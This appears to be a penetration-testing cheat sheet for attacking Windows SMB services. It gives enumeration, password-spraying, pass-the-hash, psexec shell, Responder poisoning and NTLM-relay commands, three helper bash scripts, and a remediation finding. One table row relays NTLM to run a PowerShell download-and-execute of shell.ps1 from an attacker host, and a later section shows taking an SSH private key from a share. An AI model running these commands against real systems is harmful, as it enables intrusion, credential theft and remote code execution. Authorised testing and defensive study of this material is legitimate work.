🛡️ Methodology Checklist
- Enumerate: nmap -p 445 --script smb-enum-shares,smb-enum-users [TARGET]
- NULL session: smbclient -N -L //[TARGET]
- List shares with creds: smbclient -L //[TARGET] -U [USER]
- Access share: smbclient //[TARGET]/[SHARE] -U [USER]
- Enum4linux-ng full scan: enum4linux-ng [TARGET]
- Credential spray (check the lockout policy first): nxc smb [TARGET] -u users.txt -p pass.txt
- MS17-010 EternalBlue: nmap --script smb-vuln-ms17-010 -p 445 [TARGET]
- NTLM relay if signing is not required: ntlmrelayx + Responder
🎯 Operational Context
Use when: SMB (445/139) exposed — enumerate shares, null sessions, check EternalBlue/PrintNightmare, relay attacks, or brute credentials.
Think Dumber First: run nxc smb [TARGET] first; one command returns OS, hostname/domain, signing status, and whether SMBv1 is enabled. signing:False means a relay attack is viable. Then nxc smb [TARGET] -u '' -p '' --shares for null-session share enumeration. SMBv1:True marks an EternalBlue (MS17-010) candidate to confirm with the nmap script.
Skip when: SMB signing is enforced AND creds are required — relay is blocked; focus on cred-based attacks instead.
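The triage above is usually done by eye, but on a /24 it is easier to parse the saved sweep. The script below is an added example, not code from the original page or from NetExec; it assumes NetExec's default banner line format (protocol, IP, port, hostname, then the "(signing:...) (SMBv1:...)" fields) and uses a constructed three-host sample in place of a real nxc_sweep.txt.

```shell
#!/usr/bin/env bash
# Added example, not from the original page: triage a saved `nxc smb` sweep into
# relay targets and SMBv1 (MS17-010 candidate) hosts.
# Assumes NetExec's default banner line, e.g.
#   SMB  10.10.10.5  445  DC01  [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
# captured with:  nxc smb 10.10.10.0/24 | tee nxc_sweep.txt
set -u

# Print "IP<TAB>HOST<TAB>signing<TAB>smbv1" for each banner line, ANSI colour stripped.
parse_nxc_banners() {
  sed -e "s/$(printf '\033')\\[[0-9;]*m//g" "$1" \
  | awk '/\(signing:/ {
      ip = $2; host = $4
      match($0, /\(signing:[A-Za-z]+\)/); s = substr($0, RSTART + 9, RLENGTH - 10)
      match($0, /\(SMBv1:[A-Za-z]+\)/);   v = substr($0, RSTART + 7, RLENGTH - 8)
      print ip "\t" host "\t" s "\t" v
    }'
}

# Hosts that do not require signing: the same set --gen-relay-list would write out.
relay_targets() { parse_nxc_banners "$1" | awk -F'\t' '$3 == "False" { print $1 }'; }

# Hosts still offering SMBv1: run smb-vuln-ms17-010 against these first.
smbv1_hosts() { parse_nxc_banners "$1" | awk -F'\t' '$4 == "True" { print $1 }'; }

# Constructed sample sweep (three hosts) standing in for nxc_sweep.txt.
sample_sweep() {
cat <<'EOF'
SMB         10.10.10.5      445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         10.10.10.7      445    FS01             [*] Windows Server 2012 R2 Build 9600 x64 (name:FS01) (domain:corp.local) (signing:False) (SMBv1:True)
SMB         10.10.10.9      445    WS22             [*] Windows 10 / Server 2019 Build 19041 x64 (name:WS22) (domain:corp.local) (signing:False) (SMBv1:False)
EOF
}

# Stand-alone demo: write the sample to a temp file and print both lists.
sweep_file=$(mktemp)
sample_sweep > "$sweep_file"
echo "[relay targets]";  relay_targets "$sweep_file"
echo "[SMBv1 hosts]";    smbv1_hosts "$sweep_file"
```

On the sample this yields 10.10.10.7 and 10.10.10.9 as relay targets and 10.10.10.7 as the only SMBv1 host; the DC with signing required is still useful as the machine whose users you hope will authenticate, just not as a relay destination.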
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| sudo nmap -sV -sC -p 139,445 [TARGET_IP] | SMB version scan + OS/signing detection |
| smbclient -N -L //[TARGET_IP] | List shares without credentials (null session) |
| netexec smb [TARGET_IP] -u '' -p '' --shares | Null session share enumeration |
| smbmap -H [TARGET_IP] -u null | SMBMap null session listing |
| smbmap -H [TARGET_IP] -r [SHARE] | SMBMap recursive listing of specific share |
| smbmap -H [TARGET_IP] --download "[SHARE]\file.txt" | Download file from share |
| smbmap -H [TARGET_IP] --upload test.txt "[SHARE]\test.txt" | Upload file to share |
| ./enum4linux-ng.py [TARGET_IP] -A -C | Full user/group/share enumeration |
| rpcclient -U '%' [TARGET_IP] | RPC null session connection |
| rpcclient> enumdomusers | List domain users via RPC |
| netexec smb [TARGET_IP] -u [USER] -p [WORDLIST] --local-auth | Spray against standalone/non-domain host |
| netexec smb [TARGET_IP] -u [USER] -p [WORDLIST] --local-auth -t 4 | Spray with reduced threads (connection resets) |
| netexec smb [TARGET_IP] -u Administrator -H [NT_HASH] --local-auth | Pass-the-Hash; Pwn3d! = admin |
| netexec smb [TARGET_IP] --gen-relay-list relay_targets.txt | Find hosts with SMB signing not required (relay targets) |
| smbclient //[TARGET_IP]/[SHARE] -U [USER]%[PASS] | Interactive SMB session |
| impacket-psexec [USER]:[PASS]@[TARGET_IP] | PsExec shell (requires a writable share such as ADMIN$) |
| impacket-smbexec [USER]:[PASS]@[TARGET_IP] | SMBExec shell (no binary upload, stealthier) |
| sudo responder -I tun0 | LLMNR/NBT-NS poisoning to capture hashes |
| impacket-ntlmrelayx --no-http-server -smb2support -t [TARGET_IP] -c 'powershell -c "IEX(New-Object Net.WebClient).DownloadString(\"http://[LHOST]/shell.ps1\")"' | NTLM relay to reverse shell on target |
| sudo nmap -p 445 --script smb-vuln-cve2020-0796 [TARGET_IP] | Check for SMBGhost (CVE-2020-0796) |
🔬 Deep Dive & Workflow
Enumeration Priority
- Null session: try unauthenticated access first; it often reveals share names and sometimes content
- enum4linux-ng: comprehensive; users (RID cycling), groups, shares, OS info, password policy
- RID cycling via rpcclient: when other tools are blocked; enumdomusers, then queryuser [RID] for each RID in the range
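The rpcclient RID walk, written out as an added example (not code from the original page or from Samba). It assumes rpcclient's usual "User Name : ..." and "user_rid : 0x1f4" reply layout for queryuser; the sample reply used for the stand-alone run is constructed.

```shell
#!/usr/bin/env bash
# Added example, not from the original page: RID cycling with rpcclient over a
# null session, with a parser for rpcclient's `queryuser` output.
# Assumes rpcclient from the Samba suite and its usual "User Name : ..." /
# "user_rid : 0x1f4" reply layout; the sample reply below is constructed.
set -u

# Turn one `queryuser` reply into "RID<TAB>username" (RID in decimal);
# prints nothing for NT_STATUS_NO_SUCH_USER and other error replies.
parse_queryuser() {
  awk -F':' '
    function hex2dec(h,   i, d) {
      h = tolower(h); sub(/^0x/, "", h); d = 0
      for (i = 1; i <= length(h); i++)
        d = d * 16 + index("0123456789abcdef", substr(h, i, 1)) - 1
      return d
    }
    /User Name/ { n = $2; gsub(/^[ \t]+|[ \t]+$/, "", n); name = n }
    /user_rid/  { r = $2; gsub(/[ \t]/, "", r); rid = r }
    END { if (name != "" && rid != "") printf "%d\t%s\n", hex2dec(rid), name }
  '
}

# Walk a RID range against one host. 500-1100 covers the built-ins and the first
# accounts created; widen the range once you see where the real RIDs cluster.
rid_cycle() {
  target=$1; rid=${2:-500}; end=${3:-1100}
  while [ "$rid" -le "$end" ]; do
    # queryuser accepts a decimal RID; -U '%' is an anonymous bind and only works
    # where RestrictAnonymous permits it. Errors go to stderr and are dropped.
    rpcclient -U '%' -c "queryuser $rid" "$target" 2>/dev/null | parse_queryuser
    rid=$((rid + 1))
  done
}

# Constructed sample of one `queryuser 1105` reply (abridged to the fields that matter).
sample_queryuser() {
cat <<'EOF'
        User Name   :   svc_backup
        Full Name   :   Backup Service
        Home Drive  :
        Description :   Runs nightly backups
        Logon Time               :      Thu, 01 Jan 1970 00:00:00 UTC
        user_rid :      0x451
        group_rid:      0x201
EOF
}

# Stand-alone demo: parse the sample; uncomment the last line for a live run.
sample_queryuser | parse_queryuser
# rid_cycle [TARGET_IP] 500 1100
```

If queryuser is denied but LSA lookups are not, the same walk works with lookupsids S-1-5-21-...-[RID] once lsaquery has returned the domain SID; nxc smb [TARGET] -u '' -p '' --rid-brute automates that variant.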
--local-auth (Critical Flag)
On standalone hosts (workgroup members, non-DCs), NetExec defaults to domain authentication, so valid local credentials come back as a logon failure. Always use --local-auth for:
- Linux/Samba hosts
- Windows workstations not on a domain
- Windows servers not acting as DCs
netexec smb [TARGET_IP] -u [USER] -p [PASS] --local-auth
If you see "Connection Reset" or timeouts, add -t 4 to reduce concurrency.
SSH Key via SMB
When SSH is open but requires a key (password auth disabled), look for .ssh/id_rsa in SMB shares:
smbclient //[TARGET_IP]/[SHARE] -U [USER]%[PASS]
smb: \> ls .ssh
smb: \> get id_rsa
exit
chmod 600 id_rsa
ssh -i id_rsa [USER]@[TARGET_IP]
NTLM Relay (SMB Signing Disabled)
If SMB signing is not required on the target hosts, captured NTLM authentication can be relayed to execute commands without cracking anything:
- Disable the SMB and HTTP servers in Responder so ntlmrelayx can bind those ports: edit /etc/responder/Responder.conf and set SMB = Off and HTTP = Off
- Start the relay: impacket-ntlmrelayx --no-http-server -smb2support -t [TARGET_IP] -c '[COMMAND]'
- Start Responder: sudo responder -I tun0
- Wait for an LLMNR/NBT-NS event (for example, a victim mistypes a share name)
Relay cannot loop back to the same host (reflection is blocked); the target must be a different machine from the one the authentication came from, and the relayed account needs admin rights there for -c to execute.
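The relay procedure above fails silently if Responder still owns port 445 or 80 when ntlmrelayx starts. The pre-flight below is an added example, not code from the original page or from the Responder/Impacket projects; it assumes the stock Responder.conf layout ("SMB = On" style lines under [Responder Core]) and runs against a constructed excerpt rather than the live file.

```shell
#!/usr/bin/env bash
# Added example, not from the original page: pre-flight for the relay setup.
# Responder and ntlmrelayx both want TCP 445 and 80, so Responder's SMB and HTTP
# servers must be off before the relay starts. Assumes the stock Responder.conf
# layout ("SMB = On" lines under [Responder Core]); the sample below is constructed.
set -u

# Set SMB and HTTP to Off in a Responder.conf, keeping a .bak copy. Leaves HTTPS
# and the other servers untouched (the anchored regex does not match "HTTPS =").
disable_relay_conflicts() {
  cp "$1" "$1.bak"
  sed -e 's/^SMB[[:space:]]*=[[:space:]]*On[[:space:]]*$/SMB = Off/' \
      -e 's/^HTTP[[:space:]]*=[[:space:]]*On[[:space:]]*$/HTTP = Off/' "$1.bak" > "$1"
}

# Exit status 0 only when both servers are off; run before starting ntlmrelayx.
relay_preflight() {
  grep -qx 'SMB = Off' "$1" && grep -qx 'HTTP = Off' "$1"
}

# Constructed excerpt of a default Responder.conf (weak for relay: both servers on).
sample_conf() {
cat <<'EOF'
[Responder Core]

; Servers to start
SQL = On
SMB = On
RDP = On
HTTP = On
HTTPS = On
DNS = On
EOF
}

# Stand-alone demo on a temp copy; point disable_relay_conflicts at
# /etc/responder/Responder.conf for the real thing.
conf=$(mktemp)
sample_conf > "$conf"
if relay_preflight "$conf"; then echo "unexpected: sample already prepared"; fi
disable_relay_conflicts "$conf"
relay_preflight "$conf" && echo "Responder.conf ready for relay:" && grep -E '^(SMB|HTTP|HTTPS) =' "$conf"
# Next, in two terminals (relay first so it is listening when poisoning begins):
#   sudo impacket-ntlmrelayx --no-http-server -smb2support -t [TARGET_IP] -c '[COMMAND]'
#   sudo responder -I tun0
```

Keep the .bak around: Responder with SMB and HTTP off is only right for the relay session, and you want the capture-only configuration back afterwards.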
SMBGhost (CVE-2020-0796)
Unauthenticated RCE via an integer overflow in the SMBv3.1.1 compression handling in srv2.sys. Affects Windows 10 and Windows Server 1903/1909 without the March 2020 fix. Detection only: public exploits are unstable and commonly cause a BSOD.
sudo nmap -p 445 --script smb-vuln-cve2020-0796 [TARGET_IP]
Use exploit/windows/smb/cve_2020_0796_smbghost in Metasploit only if exploitation is in scope, and warn the client of the BSOD risk first.
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| smbclient shows share but access denied | Read permission not granted | Try: smbclient -N //[TARGET]/share and smbclient //[TARGET]/share -U 'guest%' |
| EternalBlue exploit crashes target | Unstable exploit | Use a more stable PoC; test in lab first; staged payload reduces crash risk |
| Relay attack fails | SMB signing required on the target | Confirm with nxc smb [TARGET] --gen-relay-list targets.txt, which lists only hosts with signing=False; the relay destination must not require signing, and the relayed account needs admin rights on it for command execution |
| Null session enum returns nothing | RestrictAnonymous enabled | Try with guest: nxc smb [TARGET] -u guest -p ''; or use valid domain creds |
| psexec fails after hash | Writable admin share required | Verify ADMIN$ is writable: nxc smb [TARGET] -u [USER] -H [HASH] --shares |
📝 Reporting Trigger
Finding Title: SMB Relay Attack Successful: NTLM Capture and Relay
Impact: SMB relay exploits NTLM authentication without requiring hash cracking, directly authenticating to target systems as the relayed user, enabling lateral movement and privilege escalation if a Domain Admin triggers authentication.
Root Cause: SMB signing not required on target hosts and NTLM relay not prevented by network controls. Privileged users authenticating to attacker-controlled resources.
Recommendation: Require (not merely enable) SMB signing on all systems via GPO. Disable NTLMv1. Enable Extended Protection for Authentication on HTTP and LDAP endpoints. Implement network segmentation to limit SMB reachability between workstations.